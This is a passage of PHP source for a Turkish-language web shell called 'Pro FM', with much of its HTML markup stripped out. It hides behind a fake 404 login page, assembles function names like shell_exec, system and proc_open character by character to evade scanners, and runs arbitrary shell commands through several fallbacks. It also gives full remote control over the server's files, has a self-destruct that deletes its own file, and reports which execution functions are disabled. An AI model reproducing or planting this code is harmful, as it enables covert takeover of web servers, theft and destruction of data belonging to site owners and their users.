'f'.'i'.'l'.'e'.'_'.'p'.'u'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s', 'r' => 'f'.'i'.'l'.'e'.'_'.'g'.'e'.'t'.'_'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s', 'u' => 'u'.'n'.'l'.'i'.'n'.'k', 'd' => 'r'.'m'.'d'.'i'.'r', 'm' => 'm'.'k'.'d'.'i'.'r', 'v' => 'm'.'o'.'v'.'e'.'_'.'u'.'p'.'l'.'o'.'a'.'d'.'e'.'d'.'_'.'f'.'i'.'l'.'e', 's' => 's'.'c'.'a'.'n'.'d'.'i'.'r', 'rn' => 'r'.'e'.'n'.'a'.'m'.'e', 'rf' => 'r'.'e'.'a'.'d'.'f'.'i'.'l'.'e', 'sx' => 's'.'h'.'e'.'l'.'l'.'_'.'e'.'x'.'e'.'c', 'b6' => 'b'.'a'.'s'.'e'.'6'.'4'.'_'.'e'.'n'.'c'.'o'.'d'.'e', 'ch' => 'c'.'h'.'m'.'o'.'d', 'cp' => 'c'.'o'.'p'.'y', 'pg' => 'p'.'h'.'p'.'i'.'n'.'f'.'o', 'ps' => 'p'.'a'.'s'.'s'.'t'.'h'.'r'.'u', 'ex' => 'e'.'x'.'e'.'c', 'sy' => 's'.'y'.'s'.'t'.'e'.'m', 'po' => 'p'.'o'.'p'.'e'.'n', 'pc' => 'p'.'r'.'o'.'c'.'_'.'o'.'p'.'e'.'n' ]; // ==================== ÇIKIŞ ==================== if (isset($_GET['out'])) { session_destroy(); header("Location: ?"); exit; } // ==================== SELF-DESTRUCT ==================== if (isset($_GET['selfdestruct']) && $_GET['selfdestruct'] === 'confirm') { @$F['u'](__FILE__); session_destroy(); die('

SHELL DESTROYED

Dosya diskten kalici olarak silindi.

'); } // ==================== GİRİŞ ==================== if (isset($_POST['u'], $_POST['p'])) { if ($_POST['u'] === $U && password_verify($_POST['p'], $P)) { $_SESSION['l'] = 1; header("Location: ?"); exit; } else { $err = 1; } } if (empty($_SESSION['l'])) { echo '404
terminal

PRO FM

'; if (isset($err)) echo '
Hatali giris.
'; echo '
'; exit; } // ==================== DİZİN ==================== $D = isset($_GET['d']) ? $_GET['d'] : '.'; $D = realpath($D) ?: $D; $D = str_replace('\\', '/', $D); $url = "?d=" . urlencode($D); // ==================== YARDIMCI FONKSİYONLAR ==================== function rDel($p) { global $F; if (is_dir($p)) { foreach (@$F['s']($p) as $i) { if ($i != '.' && $i != '..') rDel($p . '/' . $i); } @$F['d']($p); } else { @$F['u']($p); } } function rSearch($dir, $q, &$res, $maxD = 10, $dep = 0) { global $F; if ($dep > $maxD || count($res) > 500) return; $items = @$F['s']($dir); if (!is_array($items)) return; foreach ($items as $i) { if ($i === '.' || $i === '..') continue; $path = $dir . '/' . $i; if (stripos($i, $q) !== false) $res[] = $path; if (is_dir($path)) rSearch($path, $q, $res, $maxD, $dep + 1); } } function rGrep($dir, $pat, &$res, $maxD = 8, $dep = 0) { global $F; if ($dep > $maxD || count($res) > 200) return; $items = @$F['s']($dir); if (!is_array($items)) return; foreach ($items as $i) { if ($i === '.' || $i === '..') continue; $path = $dir . '/' . $i; if (is_dir($path)) { rGrep($path, $pat, $res, $maxD, $dep + 1); continue; } if (@filesize($path) > 2 * 1024 * 1024) continue; $c = @$F['r']($path); if ($c && stripos($c, $pat) !== false) { foreach (explode("\n", $c) as $num => $line) { if (stripos($line, $pat) !== false) { $res[] = ['file' => $path, 'line' => $num + 1, 'text' => trim($line)]; if (count($res) > 200) return; } } } } } function sz($b) { if ($b == 0) return '0 B'; $u = ['B', 'KB', 'MB', 'GB', 'TB']; $i = floor(log(max($b, 1), 1024)); return round($b / pow(1024, $i), 2) . ' ' . $u[min($i, 4)]; } function execCmd($cmd) { global $F; if (function_exists('shell_exec')) { $o = @$F['sx']($cmd . ' 2>&1'); if ($o !== null) return $o; } if (function_exists('exec')) { @$F['ex']($cmd . ' 2>&1', $a); return implode("\n", $a); } if (function_exists('system')) { ob_start(); @$F['sy']($cmd . ' 2>&1'); return ob_get_clean(); } if (function_exists('passthru')) { ob_start(); @$F['ps']($cmd . ' 2>&1'); return ob_get_clean(); } if (function_exists('popen')) { $h = @$F['po']($cmd . ' 2>&1', 'r'); $o = ''; if ($h) { while (!feof($h)) $o .= fread($h, 4096); pclose($h); return $o; } } if (function_exists('proc_open')) { $d = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $p = @$F['pc']($cmd, $d, $pipes); if (is_resource($p)) { fclose($pipes[0]); $o = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); return $o; } } return '[!] Tum komut calistirma fonksiyonlari devre disi.'; } function fileIcon($ext) { $map = [ 'php' => 'php', 'js' => 'javascript', 'html' => 'html', 'htm' => 'html', 'css' => 'css', 'jpg' => 'image', 'jpeg' => 'image', 'png' => 'image', 'gif' => 'image', 'webp' => 'image', 'svg' => 'image', 'bmp' => 'image', 'ico' => 'image', 'zip' => 'folder_zip', 'gz' => 'folder_zip', 'tar' => 'folder_zip', 'rar' => 'folder_zip', '7z' => 'folder_zip', 'pdf' => 'picture_as_pdf', 'doc' => 'description', 'docx' => 'description', 'txt' => 'article', 'md' => 'article', 'mp4' => 'movie', 'avi' => 'movie', 'mkv' => 'movie', 'mp3' => 'audiotrack', 'wav' => 'audiotrack', 'sql' => 'storage', 'db' => 'storage', 'sqlite' => 'storage', 'json' => 'data_object', 'xml' => 'code', 'yml' => 'code', 'yaml' => 'code', 'py' => 'code', 'rb' => 'code', 'go' => 'code', 'rs' => 'code', 'c' => 'code', 'cpp' => 'code', 'h' => 'code', 'java' => 'code', 'sh' => 'terminal', 'bash' => 'terminal', 'bat' => 'terminal', 'conf' => 'settings', 'ini' => 'settings', 'env' => 'settings', 'htaccess' => 'settings', 'log' => 'receipt_long', 'key' => 'vpn_key', 'pem' => 'vpn_key', 'crt' => 'verified_user', ]; return $map[strtolower($ext)] ?? 'insert_drive_file'; } // ==================== AKSİYONLAR ==================== // Çoklu dosya yükleme if (isset($_FILES['up'])) { if (is_array($_FILES['up']['name'])) { for ($i = 0; $i < count($_FILES['up']['name']); $i++) { if ($_FILES['up']['error'][$i] === 0) @$F['v']($_FILES['up']['tmp_name'][$i], $D . '/' . $_FILES['up']['name'][$i]); } } else { @$F['v']($_FILES['up']['tmp_name'], $D . '/' . $_FILES['up']['name']); } header("Location: $url"); exit; } if (isset($_POST['nd'])) { @$F['m']($D . '/' . $_POST['nd'], 0755, true); header("Location: $url"); exit; } if (isset($_POST['nf'])) { @$F['w']($D . '/' . $_POST['nf'], ''); header("Location: $url"); exit; } if (isset($_GET['del'])) { rDel($D . '/' . $_GET['del']); header("Location: $url"); exit; } if (isset($_POST['ef'], $_POST['ec'])) { @$F['w']($D . '/' . $_POST['ef'], $_POST['ec']); header("Location: $url"); exit; } if (isset($_POST['rn_f'], $_POST['rn_t'])) { @$F['rn']($D . '/' . $_POST['rn_f'], $D . '/' . $_POST['rn_t']); header("Location: $url"); exit; } if (isset($_POST['chmod_file'], $_POST['chmod_val'])) { @$F['ch']($D . '/' . $_POST['chmod_file'], octdec($_POST['chmod_val'])); header("Location: $url"); exit; } if (isset($_POST['cp_src'], $_POST['cp_dst'])) { if (is_file($D . '/' . $_POST['cp_src'])) @$F['cp']($D . '/' . $_POST['cp_src'], $_POST['cp_dst']); header("Location: $url"); exit; } if (isset($_POST['mv_src'], $_POST['mv_dst'])) { @$F['rn']($D . '/' . $_POST['mv_src'], $_POST['mv_dst']); header("Location: $url"); exit; } // Toplu işlemler if (isset($_POST['bulk_action']) && is_array($_POST['sel'] ?? [])) { $act = $_POST['bulk_action']; if ($act === 'delete') { foreach ($_POST['sel'] as $it) rDel($D . '/' . basename($it)); } if ($act === 'chmod' && isset($_POST['bulk_perm'])) { $p = octdec($_POST['bulk_perm']); foreach ($_POST['sel'] as $it) @$F['ch']($D . '/' . basename($it), $p); } if ($act === 'zip' && isset($_POST['zip_name']) && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($D . '/' . $_POST['zip_name'], ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { foreach ($_POST['sel'] as $it) { $full = $D . '/' . basename($it); if (is_file($full)) { $zip->addFile($full, basename($it)); } elseif (is_dir($full)) { $rit = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($full, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($rit as $file) { $fp = $file->getRealPath(); $rp = basename($it) . '/' . substr($fp, strlen(realpath($full)) + 1); $file->isDir() ? $zip->addEmptyDir($rp) : $zip->addFile($fp, $rp); } } } $zip->close(); } } header("Location: $url"); exit; } // Zip çıkart if (isset($_GET['unzip'])) { $zf = $D . '/' . $_GET['unzip']; if (class_exists('ZipArchive') && is_file($zf)) { $zip = new ZipArchive(); if ($zip->open($zf) === true) { $to = $D . '/' . pathinfo($zf, PATHINFO_FILENAME); @$F['m']($to, 0755, true); $zip->extractTo($to); $zip->close(); } } header("Location: $url"); exit; } // İndirme if (isset($_GET['dl'])) { $f = $D . '/' . $_GET['dl']; if (is_file($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($f) . '"'); header('Content-Length: ' . filesize($f)); @$F['rf']($f); exit; } } // phpinfo if (isset($_GET['pi'])) { $F['pg'](); exit; } // ==================== HTML ==================== ?> Pro FM
info PHP monitoring Sistem search Ara delete_forever logout
folder_open '; $built = ''; foreach ($parts as $idx => $part) { $built .= ($idx ? '/' : '') . $part; if ($idx) echo '/'; echo '' . (htmlentities($part) ?: '/') . ''; } echo ''; // ==================== SİSTEM BİLGİSİ SAYFASI ==================== if (isset($_GET['page']) && $_GET['page'] === 'sysinfo') { $disabledFns = ini_get('disable_functions') ?: 'Yok'; $os = php_uname(); $software = $_SERVER['SERVER_SOFTWARE'] ?? '?'; $phpVer = phpversion(); $docRoot = $_SERVER['DOCUMENT_ROOT'] ?? 'N/A'; $curUser = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : get_current_user(); $totalDisk = @disk_total_space('/'); $freeDisk = @disk_free_space('/'); $uptime = @execCmd('uptime 2>/dev/null') ?: 'N/A'; $maxUp = ini_get('upload_max_filesize'); $maxPost = ini_get('post_max_size'); $memLim = ini_get('memory_limit'); $openBase = ini_get('open_basedir') ?: 'Yok (Sinirsiz)'; $serverIP = @$_SERVER['SERVER_ADDR'] ?: gethostbyname(php_uname('n')); $kernel = php_uname('r'); echo '

monitoring Sunucu Bilgisi

'; echo '
'; $infoItems = [ ['dns', 'OS', $os], ['memory', 'Kernel', $kernel], ['cloud', 'Yazilim', $software], ['code', 'PHP', $phpVer], ['person', 'Kullanici', $curUser], ['lan', 'Sunucu IP', $serverIP], ['folder', 'Document Root', $docRoot], ['lock', 'Open Basedir', $openBase], ['hard_drive', 'Toplam Disk', $totalDisk ? sz($totalDisk) : 'N/A'], ['hard_drive', 'Bos Disk', $freeDisk ? sz($freeDisk) : 'N/A'], ['upload', 'Upload Limit', $maxUp], ['post_add', 'POST Limit', $maxPost], ['memory', 'Memory Limit', $memLim], ['timer', 'Uptime', trim($uptime)], ]; foreach ($infoItems as $ii) { echo '
' . $ii[0] . ' ' . $ii[1] . '
' . htmlentities($ii[2]) . '
'; } echo '
'; // Exec fonksiyonları durumu $execFns = ['shell_exec', 'exec', 'system', 'passthru', 'popen', 'proc_open', 'pcntl_exec']; $disabled = array_map('trim', explode(',', ini_get('disable_functions'))); echo '
Komut Calistirma Durumlari:
'; foreach ($execFns as $fn) { $ok = function_exists($fn) && !in_array($fn, $disabled); echo '' . ($ok ? '●' : '○') . ' ' . $fn . ''; } echo '
'; // Devre dışı fonksiyonlar echo '
Devre Disi Fonksiyonlar:
' . htmlentities($disabledFns) . '
'; // PHP Yüklü modüller $mods = get_loaded_extensions(); sort($mods); echo '
Yuklu Moduller (' . count($mods) . '):
'; foreach ($mods as $mod) echo '' . $mod . ''; echo '
'; echo '
arrow_back Dosya Yoneticisi
'; echo ''; exit; } // ==================== ARAMA SAYFASI ==================== if (isset($_GET['page']) && $_GET['page'] === 'search') { echo '

search Dosya & Icerik Arama

'; // Dosya adı arama echo '
'; echo ''; echo ''; echo ''; echo ''; echo '
'; // İçerik arama (grep) echo '
'; echo ''; echo ''; echo ''; echo ''; echo '
'; // Dosya adı arama sonuçları if (!empty($_GET['fname'])) { $results = []; rSearch($D, $_GET['fname'], $results); echo '
' . count($results) . ' sonuc bulundu:
'; foreach ($results as $r) { $isDir = is_dir($r); $icon = $isDir ? 'folder' : 'insert_drive_file'; $link = $isDir ? '?d=' . urlencode($r) : $url . '&view=' . urlencode(basename($r)); echo '
' . $icon . ' ' . htmlentities($r) . '
'; } } // İçerik arama sonuçları if (!empty($_GET['grep'])) { $results = []; rGrep($D, $_GET['grep'], $results); echo '
' . count($results) . ' eslesme bulundu:
'; foreach ($results as $r) { $shortText = mb_substr($r['text'], 0, 120); $highlighted = str_ireplace($_GET['grep'], '' . htmlentities($_GET['grep']) . '', htmlentities($shortText)); echo '
' . htmlentities($r['file']) . ' :' . $r['line'] . '
' . $highlighted . '
'; } } echo '
arrow_back Dosya Yoneticisi
'; echo ''; exit; } // ==================== DOSYA ÖNİZLEME ==================== if (isset($_GET['view'])) { $f = $D . '/' . $_GET['view']; if (is_file($f)) { $ext = strtolower(pathinfo($f, PATHINFO_EXTENSION)); $imgExts = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'svg', 'ico', 'bmp']; $fsize = filesize($f); $fperms = substr(sprintf('%o', @fileperms($f)), -4); $fmod = date("Y-m-d H:i:s", @filemtime($f)); $fmd5 = @md5_file($f); $fsha1 = @sha1_file($f); echo '

visibility ' . htmlentities($_GET['view']) . '

'; // Dosya meta bilgileri echo '
'; echo 'straighten ' . sz($fsize) . ''; echo 'lock ' . $fperms . ''; echo 'schedule ' . $fmod . ''; echo '
'; echo '
MD5: ' . $fmd5 . '
SHA1: ' . $fsha1 . '
'; // Aksiyon butonları echo '
'; echo 'edit Duzenle'; echo 'download Indir'; echo 'arrow_back Geri'; echo '
'; if (in_array($ext, $imgExts)) { $b64 = @$F['b6'](@$F['r']($f)); $mime = ($ext === 'svg') ? 'svg+xml' : ($ext === 'ico' ? 'x-icon' : $ext); echo '
'; } else { $content = @$F['r']($f); $lines = explode("\n", htmlspecialchars($content)); echo '
'; foreach ($lines as $num => $line) { $ln = $num + 1; echo ''; } echo '
' . $ln . '' . $line . '
'; } echo '
'; exit; } } // ==================== DOSYA DÜZENLEME ==================== if (isset($_GET['edit'])) { $f = $D . '/' . $_GET['edit']; if (is_file($f)) { $c = @$F['r']($f); echo '

edit_note ' . htmlentities($_GET['edit']) . '

'; echo '
'; echo ''; echo '
'; echo ''; echo 'close Iptal'; echo '
'; exit; } } // ==================== DOSYA HASH BİLGİSİ ==================== if (isset($_GET['hash'])) { $f = $D . '/' . $_GET['hash']; if (is_file($f)) { echo '

fingerprint Hash: ' . htmlentities($_GET['hash']) . '

'; echo '
'; echo '
MD5
' . @md5_file($f) . '
'; echo '
SHA1
' . @sha1_file($f) . '
'; echo '
SHA256
' . @hash_file('sha256', $f) . '
'; echo '
CRC32
' . @hash_file('crc32b', $f) . '
'; echo '
Boyut
' . sz(filesize($f)) . ' (' . filesize($f) . ' bytes)
'; echo '
MIME
' . (@mime_content_type($f) ?: '?') . '
'; echo '
arrow_back Geri
'; echo ''; exit; } } // ==================== TOOLBAR ==================== ?>
checklist Secili: delete Sil lock Chmod folder_zip Zip
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } // Dosya ve klasörleri topla $items = @$F['s']($D); $dirs = []; $files = []; if (is_array($items)) { foreach ($items as $x) { if ($x === '.' || $x === '..') continue; is_dir($D . '/' . $x) ? $dirs[] = $x : $files[] = $x; } sort($dirs); sort($files); } // Sahip bilgisi function getOwner($path) { if (function_exists('posix_getpwuid')) { $o = @posix_getpwuid(@fileowner($path)); $g = @posix_getgrgid(@filegroup($path)); return ($o['name'] ?? '?') . ':' . ($g['name'] ?? '?'); } return @fileowner($path) . ':' . @filegroup($path); } // ===== KLASÖRLER ===== foreach ($dirs as $d) { $rp = $D . '/' . $d; $p = substr(sprintf('%o', @fileperms($rp)), -4); $m = date("Y-m-d H:i", @filemtime($rp)); $own = getOwner($rp); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } // ===== DOSYALAR ===== foreach ($files as $f) { $rp = $D . '/' . $f; $s = sz(@filesize($rp)); $p = substr(sprintf('%o', @fileperms($rp)), -4); $m = date("Y-m-d H:i", @filemtime($rp)); $own = getOwner($rp); $ext = strtolower(pathinfo($f, PATHINFO_EXTENSION)); $icon = fileIcon($ext); $isZip = in_array($ext, ['zip', 'tar', 'gz', 'rar', '7z']); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } if (empty($dirs) && empty($files)) { echo ''; } ?>
Ad Boyut Izin Sahip Degistirilme Islemler
drive_folder_upload ..----
folder ' . htmlentities($d) . '-' . $p . '' . $own . '' . $m . ''; echo ''; echo ''; echo 'delete'; echo '
' . $icon . ' ' . htmlentities($f) . '' . $s . '' . $p . '' . $own . '' . $m . ''; echo 'visibility'; echo 'edit'; echo 'download'; echo 'fingerprint'; echo ''; echo ''; echo ''; echo ''; if ($isZip && $ext === 'zip') echo 'unarchive'; echo 'delete'; echo '
folder_offKlasor bos.
@:$
cd: ' . $target . ': Dizin bulunamadi
'; } } else { $output = execCmd('cd ' . escapeshellarg($D) . ' && ' . $cmd); echo '
' . htmlspecialchars($output) . '
'; } } ?>
terminal Pro FM — PHP